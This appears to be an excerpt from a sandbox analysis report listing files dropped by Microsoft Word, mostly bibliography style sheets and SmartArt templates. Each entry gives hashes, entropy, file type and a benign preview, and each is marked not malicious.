                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                            File Type:data
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):290
                                                                                                                            Entropy (8bit):3.5161159456784024
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:6:fxnxUX+l8ME3QepmlJ0+3FbnKfZObdADryMluxHZypwwyv:fxnyulNGHmD0wbnKYZAH/lMZqiv
                                                                                                                            MD5:C15EB3F4306EBF75D1E7C3C9382DEECC
                                                                                                                            SHA1:A3F9684794FFD59151A80F97770D4A79F1D030A6
                                                                                                                            SHA-256:23C262DF3AEACB125E88C8FFB7DBF56FD23F66E0D476AFD842A68DDE69658C7F
                                                                                                                            SHA-512:ACDF7D69A815C42223FD6300179A991A379F7166EFAABEE41A3995FB2030CD41D8BCD46B566B56D1DFBAE8557AFA1D9FD55143900A506FA733DE9DA5D73389D6
                                                                                                                            Malicious:false
                                                                                                                            Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .t.u.r.a.b.i.a.n...x.s.l.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.W.D.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. ./.f. .{.F.i.l.e.P.a.t.h.}.........
                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                            File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):344303
                                                                                                                            Entropy (8bit):5.023195898304535
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:6144:UwprANnsqvtfL/vF/bkWPRMMv7EOMBPitjASjTQQr7IwR0TnyDk1b78plJwf33iD:6
                                                                                                                            MD5:F079EC5E2CCB9CD4529673BCDFB90486
                                                                                                                            SHA1:FBA6696E6FA918F52997193168867DD3AEBE1AD6
                                                                                                                            SHA-256:3B651258F4D0EE1BFFC7FB189250DED1B920475D1682370D6685769E3A9346DB
                                                                                                                            SHA-512:4FFFA59863F94B3778F321DA16C43B92A3053E024BDD8C5317077EA1ECC7B09F67ECE3C377DB693F3432BF1E2D947EC5BF8E88E19157ED08632537D8437C87D6
                                                                                                                            Malicious:false
                                                                                                                            Preview:<?xml version="1.0" encoding="utf-8"?>......<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt" xmlns:b="http://schemas.openxmlformats.org/officeDocument/2006/bibliography" xmlns:t="http://www.microsoft.com/temp">...<xsl:output method="html" encoding="us-ascii"/>............<xsl:template match="*" mode="outputHtml2">.....<xsl:apply-templates mode="outputHtml"/>.....</xsl:template>.....<xsl:template name="StringFormatDot">....<xsl:param name="format" />....<xsl:param name="parameters" />.... <xsl:variable name="prop_EndChars">.. <xsl:call-template name="templ_prop_EndChars"/>.. </xsl:variable>.... <xsl:choose>.....<xsl:when test="$format = ''"></xsl:when>.....<xsl:when test="substring($format, 1, 2) = '%%'">......<xsl:text>%</xsl:text>......<xsl:call-template name="StringFormatDot">.......<xsl:with-param name="format" select="substring($format, 3)" />.......<xsl:with-param name="parameters" select="$pa
                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                            File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):16806
                                                                                                                            Entropy (8bit):7.9519793977093505
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:384:eSMjhqgJDGwOzHR3iCpK+QdLdfufFJ9aDn9LjDMVAwHknbz7OW:eSkhqglGwERSAHQdLhDn9AKokv7H
                                                                                                                            MD5:950F3AB11CB67CC651082FEBE523AF63
                                                                                                                            SHA1:418DE03AD2EF93D0BD29C3D7045E94D3771DACB4
                                                                                                                            SHA-256:9C5E4D8966A0B30A22D92DB1DA2F0DBF06AC2EA75E7BB8501777095EA0196974
                                                                                                                            SHA-512:D74BF52A58B0C0327DB9DDCAD739794020F00B3FA2DE2B44DAAEC9C1459ECAF3639A5D761BBBC6BDF735848C4FD7E124D13B23964B0055BB5AA4F6AFE76DFE00
                                                                                                                            Malicious:false
                                                                                                                            Preview:PK.........T.>................[Content_Types].xmlz.........=N.1...b.Eko(.B....(.Pp..=.u.?.....#q..ND.!$.J{.o....G..[Cv.....+.R.Nx..........0."u..S...$&.....Je..B..x......m......M^z....f....|...N..Q..z.!.- .2.9y.i.8j...........0.AE..p.s~@../jw.#8.I.#....4.~Cl.:#h..f.PU.s.~........(.)F..Y......^x..PK.........T.>...V....L......._rels/.rels...J.@.._e..]AD.....x....3.t..T.w.\ZpA<x......v..'....z.........Y..[...<..2.TT....Q$.!.=.....&C....b".F.q.7...X3...7.8.N.}.. ?..8...#..,.L.3.#e...wZpZ.]S..:....t.....{..6.7.|..,dH.e..K 7-}.~.v...5.......b..PK........Ul.<..<"I5...&......diagrams/layout1.xml.}.r.I..s........~Y.f.gzfv......E."w.K..J5m.e...4.0..Q... A.!...%...<...3.......O.......t~.u{...5.G......?,.........N......L......~.:....^,..r=./~7_..8............o.y......oo.3.f........f.......r.7../....qrr.v9.......,?..._O.....?9.O~]..zv.I'.W..........;..\..~....../........?~..n.....\}pt.........b,~...;>.=;>:..u.....?.......2]..]....i......9..<.p..4D..
                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                            File Type:data
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):254
                                                                                                                            Entropy (8bit):3.4720677950594836
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:6:fxnxUXOu9+MlWlk2E3QepmlJ0+hdADryMluyS6Bkls0Lwv:fxnycMlWlzGHmD0+dAH/luWvv
                                                                                                                            MD5:D04EC08EFE18D1611BDB9A5EC0CC00B1
                                                                                                                            SHA1:668FF6DFE64D5306220341FC2C1353199D122932
                                                                                                                            SHA-256:FA60500F951AFAF8FFDB6D1828456D60004AE1558E8E1364ADC6ECB59F5450C9
                                                                                                                            SHA-512:97EBCCAF64FA33238B7CFC0A6D853EFB050D877E21EE87A78E17698F0BB38382FCE7F6C4D97D550276BD6B133D3099ECAB9CFCD739F31BFE545F4930D896EEC3
                                                                                                                            Malicious:false
                                                                                                                            Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .C.i.r.c.l.e.P.r.o.c.e.s.s...g.l.o.x.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.\.S.m.a.r.t.A.r.t. .G.r.a.p.h.i.c.s.........
                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                            File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):333258
                                                                                                                            Entropy (8bit):4.654450340871081
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:6144:ybW83Zb181+MKHZR5D7H3hgtfL/8mIDbEhPv9FHSVsioWUyGYmwxAw+GIfnUNv5J:i
                                                                                                                            MD5:5632C4A81D2193986ACD29EADF1A2177
                                                                                                                            SHA1:E8FF4FDFEB0002786FCE1CF8F3D25F8E9631E346
                                                                                                                            SHA-256:06DE709513D7976690B3DD8F5FDF1E59CF456A2DFBA952B97EACC72FE47B238B
                                                                                                                            SHA-512:676CE1957A374E0F36634AA9CFFBCFB1E1BEFE1B31EE876483B10763EA9B2D703F2F3782B642A5D7D0945C5149B572751EBD9ABB47982864834EF61E3427C796
                                                                                                                            Malicious:false
                                                                                                                            Preview:<?xml version="1.0" encoding="utf-8"?>....<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt".xmlns:b="http://schemas.openxmlformats.org/officeDocument/2006/bibliography" xmlns:t="http://www.microsoft.com/temp">.. <xsl:output method="html" encoding="us-ascii"/>.... <xsl:template match="*" mode="outputHtml2">.. <xsl:apply-templates mode="outputHtml"/>.. </xsl:template>.... <xsl:template name="StringFormatDot">.. <xsl:param name="format" />.. <xsl:param name="parameters" />.... <xsl:variable name="prop_EndChars">.. <xsl:call-template name="templ_prop_EndChars"/>.. </xsl:variable>.... <xsl:choose>.. <xsl:when test="$format = ''"></xsl:when>.. <xsl:when test="substring($format, 1, 2) = '%%'">.. <xsl:text>%</xsl:text>.. <xsl:call-template name="StringFormatDot">.. <xsl:with-param name="format" select="substring($format, 3)" />.. <xsl:with-param name=
                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                            File Type:data
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):328
                                                                                                                            Entropy (8bit):3.541819892045459
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:6:fxnxUXuqRDA5McaQVTi8ME3QepmlJ0+3FbnKfZObdADryMluxHZypwwyv:fxny+AASZQoNGHmD0wbnKYZAH/lMZqiv
                                                                                                                            MD5:C3216C3FC73A4B3FFFE7ED67153AB7B5
                                                                                                                            SHA1:F20E4D33BABE978BE6A6925964C57D6E6EF1A92E
                                                                                                                            SHA-256:7CF1D6A4F0BE5E6184F59BFB1304509F38E480B59A3B091DBDC43B052D2137CB
                                                                                                                            SHA-512:D3B78BE6E7633FF943F5E34063B5EFA4AF239CD49F437227FC7575F6CC65C497B7D6F6A979EA065065BEAF257CB368560B5462542692286052B5C7E5C01755BC
                                                                                                                            Malicious:false
                                                                                                                            Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .A.P.A.S.i.x.t.h.E.d.i.t.i.o.n.O.f.f.i.c.e.O.n.l.i.n.e...x.s.l.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.W.D.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. ./.f. .{.F.i.l.e.P.a.t.h.}.........
                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                            File Type:data
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):302
                                                                                                                            Entropy (8bit):3.537169234443227
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:6:fxnxUXfQIUA/e/Wl8ME3QepmlJ0+3FbnKfZObdADryMluxHZypwwyv:fxnyXZ/eulNGHmD0wbnKYZAH/lMZqiv
                                                                                                                            MD5:9C00979164E78E3B890E56BE2DF00666
                                                                                                                            SHA1:1FA3C439D214C34168ADF0FBA5184477084A0E51
                                                                                                                            SHA-256:21CCB63A82F1E6ACD6BAB6875ABBB37001721675455C746B17529EE793382C7B
                                                                                                                            SHA-512:54AC8732C2744B60DA744E54D74A2664658E4257A136ABE886FF21585E8322E028D8243579D131EF4E9A0ABDDA70B4540A051C8B8B60D65C3EC0888FD691B9A7
                                                                                                                            Malicious:false
                                                                                                                            Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .i.s.o.6.9.0.n.m.e.r.i.c.a.l...x.s.l.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.W.D.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. ./.f. .{.F.i.l.e.P.a.t.h.}.........
                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                            File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):217137
                                                                                                                            Entropy (8bit):5.068335381017074
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:6144:AwprA3Z95vtf58pb1WP2DCvCmvQursq7vIme5QyQzSS1apSiQhHDlruvoVeMUwFj:4P
                                                                                                                            MD5:3BF8591E1D808BCCAD8EE2B822CC156B
                                                                                                                            SHA1:9CC1E5EFD715BD0EAE5AF983FB349BAC7A6D7BA0
                                                                                                                            SHA-256:7194396E5C833E6C8710A2E5D114E8E24338C64EC9818D51A929D57A5E4A76C8
                                                                                                                            SHA-512:D434A4C15DA3711A5DAAF5F7D0A5E324B4D94A04B3787CA35456BFE423EAC9D11532BB742CDE6E23C16FA9FD203D3636BD198B41C7A51E7D3562D5306D74F757
                                                                                                                            Malicious:false
                                                                                                                            Preview:<?xml version="1.0" encoding="utf-8"?>..<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt".xmlns:b="http://schemas.openxmlformats.org/officeDocument/2006/bibliography" xmlns:t="http://www.microsoft.com/temp">...<xsl:output method="html" encoding="us-ascii"/>..........<xsl:template match="*" mode="outputHtml2">.....<xsl:apply-templates mode="outputHtml"/>.....</xsl:template>.....<xsl:template name="StringFormatDot">....<xsl:param name="format" />....<xsl:param name="parameters" />.... <xsl:variable name="prop_EndChars">.. <xsl:call-template name="templ_prop_EndChars"/>.. </xsl:variable>...... <xsl:choose>.....<xsl:when test="$format = ''"></xsl:when>.....<xsl:when test="substring($format, 1, 2) = '%%'">......<xsl:text>%</xsl:text>......<xsl:call-template name="StringFormatDot">.......<xsl:with-param name="format" select="substring($format, 3)" />.......<xsl:with-param name="parameters" select="$parame
                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                            File Type:data
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):332
                                                                                                                            Entropy (8bit):3.4871192480632223
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:6:fxnxUXsdDUaw93Ti8ME3QepmlJ0+3FbnKfZObdADryMluxHZypwwyv:fxnyoRw9eNGHmD0wbnKYZAH/lMZqiv
                                                                                                                            MD5:333BA58FCE326DEA1E4A9DE67475AA95
                                                                                                                            SHA1:F51FAD5385DC08F7D3E11E1165A18F2E8A028C14
                                                                                                                            SHA-256:66142D15C7325B98B199AB6EE6F35B7409DE64EBD5C0AB50412D18CBE6894097
                                                                                                                            SHA-512:BFEE521A05B72515A8D4F7D13D8810846DC60F1E85C363FFEBD6CACD23AE8D2E664C563FC74700A4ED4E358F378508D25C46CB5BE1CF587E2E278EBC22BB2625
                                                                                                                            Malicious:false
                                                                                                                            Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .m.l.a.s.e.v.e.n.t.h.e.d.i.t.i.o.n.o.f.f.i.c.e.o.n.l.i.n.e...x.s.l.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.W.D.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. ./.f. .{.F.i.l.e.P.a.t.h.}.........
                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                            File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):254875
                                                                                                                            Entropy (8bit):5.003842588822783
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:6144:MwprAnniNgtfbzbOWPuv7kOMBLitjAUjTQLrYHwR0TnyDkHqV3iPr1zHX5T6SSXj:a
                                                                                                                            MD5:377B3E355414466F3E3861BCE1844976
                                                                                                                            SHA1:0B639A3880ACA3FD90FA918197A669CC005E2BA4
                                                                                                                            SHA-256:4AC5B26C5E66E122DE80243EF621CA3E1142F643DD2AD61B75FF41CFEE3DFFAF
                                                                                                                            SHA-512:B050AD52A8161F96CBDC880DD1356186F381B57159F5010489B04528DB798DB955F0C530465AB3ECD5C653586508429D98336D6EB150436F1A53ABEE0697AEB9
                                                                                                                            Malicious:false
                                                                                                                            Preview:<?xml version="1.0" encoding="utf-8"?>......<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt" xmlns:b="http://schemas.openxmlformats.org/officeDocument/2006/bibliography" xmlns:t="http://www.microsoft.com/temp">...<xsl:output method="html" encoding="us-ascii"/>.....<xsl:template match="*" mode="outputHtml2">.....<xsl:apply-templates mode="outputHtml"/>...</xsl:template>.....<xsl:template name="StringFormatDot">....<xsl:param name="format" />....<xsl:param name="parameters" />......<xsl:variable name="prop_EndChars">.....<xsl:call-template name="templ_prop_EndChars"/>....</xsl:variable>......<xsl:choose>.....<xsl:when test="$format = ''"></xsl:when>.....<xsl:when test="substring($format, 1, 2) = '%%'">......<xsl:text>%</xsl:text>......<xsl:call-template name="StringFormatDot">.......<xsl:with-param name="format" select="substring($format, 3)" />.......<xsl:with-param name="parameters" select="$parameters" />......
                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                            File Type:data
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):256
                                                                                                                            Entropy (8bit):3.4842773155694724
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:6:fxnxUXDAlIJAFIloE3QepmlJ0+hdADryMluyS6Bkls0Lwv:fxnyMlI7loGHmD0+dAH/luWvv
                                                                                                                            MD5:923D406B2170497AD4832F0AD3403168
                                                                                                                            SHA1:A77DA08C9CB909206CDE42FE1543B9FE96DF24FB
                                                                                                                            SHA-256:EBF9CF474B25DDFE0F6032BA910D5250CBA2F5EDF9CF7E4B3107EDB5C13B50BF
                                                                                                                            SHA-512:A4CD8C74A3F916CA6B15862FCA83F17F2B1324973CCBCC8B6D9A8AEE63B83A3CD880DC6821EEADFD882D74C7EF58FA586781DED44E00E8B2ABDD367B47CE45B7
                                                                                                                            Malicious:false
                                                                                                                            Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .C.o.n.v.e.r.g.i.n.g.T.e.x.t...g.l.o.x.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.\.S.m.a.r.t.A.r.t. .G.r.a.p.h.i.c.s.........
                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                            File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):11380
                                                                                                                            Entropy (8bit):7.891971054886943
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:192:VJcnLYnAVbOFLaCPLrGGbhaWEu6d3RmryqLkeAShObPb1AYcRMMXjkfa0nYBwggD:VcMC8lLrRbhy1ZqLyShYb1FHQ4C0nYQJ
                                                                                                                            MD5:C9F9364C659E2F0C626AC0D0BB519062
                                                                                                                            SHA1:C4036C576074819309D03BB74C188BF902D1AE00
                                                                                                                            SHA-256:6FC428CA0DCFC27D351736EF16C94D1AB08DDA50CB047A054F37EC028DD08AA2
                                                                                                                            SHA-512:173A5E68E55163B081C5A8DA24AE46428E3FB326EBE17AE9588C7F7D7E5E5810BFCF08C23C3913D6BEC7369E06725F50387612F697AC6A444875C01A2C94D0FF
                                                                                                                            Malicious:false
                                                                                                                            Preview:PK.........T.>................[Content_Types].xmlz.........=N.1...b.Eko(.B....(.Pp..=.u.?.....#q..ND.!$.J{.o....G..[Cv.....+.R.Nx..........0."u..S...$&.....Je..B..x......m......M^z....f....|...N..Q..z.!.- .2.9y.i.8j...........0.AE..p.s~@../jw.#8.I.#....4.~Cl.:#h..f.PU.s.~........(.)F..Y......^x..PK.........T.>...V....L......._rels/.rels...J.@.._e..]AD.....x....3.t..T.w.\ZpA<x......v..'....z.........Y..[...<..2.TT....Q$.!.=.....&C....b".F.q.7...X3...7.8.N.}.. ?..8...#..,.L.3.#e...wZpZ.]S..:....t.....{..6.7.|..,dH.e..K 7-}.~.v...5.......b..PK........q.~<.6..9 ...e......diagrams/layout1.xml..r.........{.]..u...xv7b.....HPd....t.q...b.i_a.'..P.f.3..F..1...U.u.*.2......?}..O..V.....yQ.Mf........w.....O....N.........t3;...e....j.^.o&.....w...../.w................e.................O..,./..6...8>^.^..........ru5...\.=>[M?......g..........w.N....i.........iy6.?........>.......>{yT...........x.........-...z5.L./.g......_.l.1.....#...|...pr.q
                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                            File Type:data
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):314
                                                                                                                            Entropy (8bit):3.5230842510951934
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:6:fxnxUXJuJaw93Ti8ME3QepmlJ0+3FbnKfZObdADryMluxHZypwwyv:fxnyZuUw9eNGHmD0wbnKYZAH/lMZqiv
                                                                                                                            MD5:F25AC64EC63FA98D9E37782E2E49D6E6
                                                                                                                            SHA1:97DD9CFA4A22F5B87F2B53EFA37332A9EF218204
                                                                                                                            SHA-256:834046A829D1EA836131B470884905856DBF2C3C136C98ADEEFA0F206F38F8AB
                                                                                                                            SHA-512:A0387239CDE98BCDE1668B582B046619C3B3505F9440343DAD22B1B7B9E05F3B74F2AE29E591EC37B6570A0C0E5FE571442873594B0684DDCCB4F6A1B5E10B1F
                                                                                                                            Malicious:false
                                                                                                                            Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .i.e.e.e.2.0.0.6.o.f.f.i.c.e.o.n.l.i.n.e...x.s.l.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.W.D.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. ./.f. .{.F.i.l.e.P.a.t.h.}.........
                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                            File Type:XML 1.0 document, Unicode text, UTF-8 text, with CRLF line terminators
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):294178
                                                                                                                            Entropy (8bit):4.977758311135714
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:6144:ydkJ3yU0orh0SCLVXyMFsoiOjWIm4vW2uo4hfhf7v3uH4NYYP4BpBaZTTSSamEUD:b
                                                                                                                            MD5:0C9731C90DD24ED5CA6AE283741078D0
                                                                                                                            SHA1:BDD3D7E5B0DE9240805EA53EF2EB784A4A121064
                                                                                                                            SHA-256:ABCE25D1EB3E70742EC278F35E4157EDB1D457A7F9D002AC658AAA6EA4E4DCDF
                                                                                                                            SHA-512:A39E6201D6B34F37C686D9BD144DDD38AE212EDA26E3B81B06F1776891A90D84B65F2ABC5B8F546A7EFF3A62D35E432AF0254E2F5BFE4AA3E0CF9530D25949C0
                                                                                                                            Malicious:false
                                                                                                                            Preview:<?xml version="1.0" encoding="utf-8"?>....<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt"......xmlns:b="http://schemas.openxmlformats.org/officeDocument/2006/bibliography" xmlns:t="http://www.microsoft.com/temp">.....<xsl:output method="html" encoding="us-ascii"/>.....<xsl:template match="/">....<xsl:call-template name="Start"/>...</xsl:template>.....<xsl:template name="Start">....<xsl:choose>.....<xsl:when test="b:Version">......<xsl:text>2010.2.02</xsl:text>.....</xsl:when>.......<xsl:when test="b:XslVersion">......<xsl:text>2006</xsl:text>.....</xsl:when>.. <xsl:when test="b:StyleNameLocalized">.. <xsl:choose>.. <xsl:when test="b:StyleNameLocalized/b:Lcid='1033'">.. <xsl:text>IEEE</xsl:text>.. </xsl:when>.. <xsl:when test="b:StyleNameLocalized/b:Lcid='1025'">.. <xsl:text>IEEE</xsl:text>.. </xsl:when>.. <xsl:when test="b:StyleNameL
                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                            File Type:data
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):286
                                                                                                                            Entropy (8bit):3.5502940710609354
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:6:fxnxUXfQICl8ME3QepmlJ0+3FbnKfZObdADryMluxHZypwwyv:fxnyXClNGHmD0wbnKYZAH/lMZqiv
                                                                                                                            MD5:9B8D7EFE8A69E41CDC2439C38FE59FAF
                                                                                                                            SHA1:034D46BEC5E38E20E56DD905E2CA2F25AF947ED1
                                                                                                                            SHA-256:70042F1285C3CD91DDE8D4A424A5948AE8F1551495D8AF4612D59709BEF69DF2
                                                                                                                            SHA-512:E50BB0C68A33D35F04C75F05AD4598834FEC7279140B1BB0847FF39D749591B8F2A0C94DA4897AAF6C33C50C1D583A836B0376015851910A77604F8396C7EF3C
                                                                                                                            Malicious:false
                                                                                                                            Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .i.s.o.6.9.0...x.s.l.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.W.D.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. ./.f. .{.F.i.l.e.P.a.t.h.}.........
                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                            File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):270198
                                                                                                                            Entropy (8bit):5.073814698282113
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:6144:JwprAiaR95vtfb8pDbgWPzDCvCmvQursq7vImej/yQ4SS1apSiQhHDOruvoVeMUX:We
                                                                                                                            MD5:FF0E07EFF1333CDF9FC2523D323DD654
                                                                                                                            SHA1:77A1AE0DD8DBC3FEE65DD6266F31E2A564D088A4
                                                                                                                            SHA-256:3F925E0CC1542F09DE1F99060899EAFB0042BB9682507C907173C392115A44B5
                                                                                                                            SHA-512:B4615F995FAB87661C2DBE46625AA982215D7BDE27CAFAE221DCA76087FE76DA4B4A381943436FCAC1577CB3D260D0050B32B7B93E3EB07912494429F126BB3D
                                                                                                                            Malicious:false
                                                                                                                            Preview:<?xml version="1.0" encoding="utf-8"?>..<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt".xmlns:b="http://schemas.openxmlformats.org/officeDocument/2006/bibliography" xmlns:t="http://www.microsoft.com/temp">...<xsl:output method="html" encoding="us-ascii"/>..............<xsl:template match="*" mode="outputHtml2">.....<xsl:apply-templates mode="outputHtml"/>.....</xsl:template>.....<xsl:template name="StringFormatDot">....<xsl:param name="format" />....<xsl:param name="parameters" />.... <xsl:variable name="prop_EndChars">.. <xsl:call-template name="templ_prop_EndChars"/>.. </xsl:variable>.... <xsl:choose>.....<xsl:when test="$format = ''"></xsl:when>.....<xsl:when test="substring($format, 1, 2) = '%%'">......<xsl:text>%</xsl:text>......<xsl:call-template name="StringFormatDot">.......<xsl:with-param name="format" select="substring($format, 3)" />.......<xsl:with-param name="parameters" select="$para
                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                            File Type:data
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):256
                                                                                                                            Entropy (8bit):3.464918006641019
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:6:fxnxUXR+EqRGRnRE3QepmlJ0+3FbnKfZObdADxp1RDWlVwv:fxnyB+5RmRGHmD0wbnKYZAH+Vwv
                                                                                                                            MD5:93149E194021B37162FD86684ED22401
                                                                                                                            SHA1:1B31CAEBE1BBFA529092BE834D3B4AD315A6F8F1
                                                                                                                            SHA-256:50BE99A154A6F632D49B04FCEE6BCA4D6B3B4B7C1377A31CE9FB45C462D697B2
                                                                                                                            SHA-512:410A7295D470EC85015720B2B4AC592A472ED70A04103D200FA6874BEA6A423AF24766E98E5ACAA3A1DBC32C44E8790E25D4611CD6C0DBFFFE8219D53F33ACA7
                                                                                                                            Malicious:false
                                                                                                                            Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .E.q.u.a.t.i.o.n.s...d.o.t.x.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.W.D.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.W.D. .D.o.c.u.m.e.n.t. .P.a.r.t.s.}.........
                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                            File Type:Microsoft Word 2007+
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):51826
                                                                                                                            Entropy (8bit):5.541375256745271
                                                                                                                            Encrypted:false
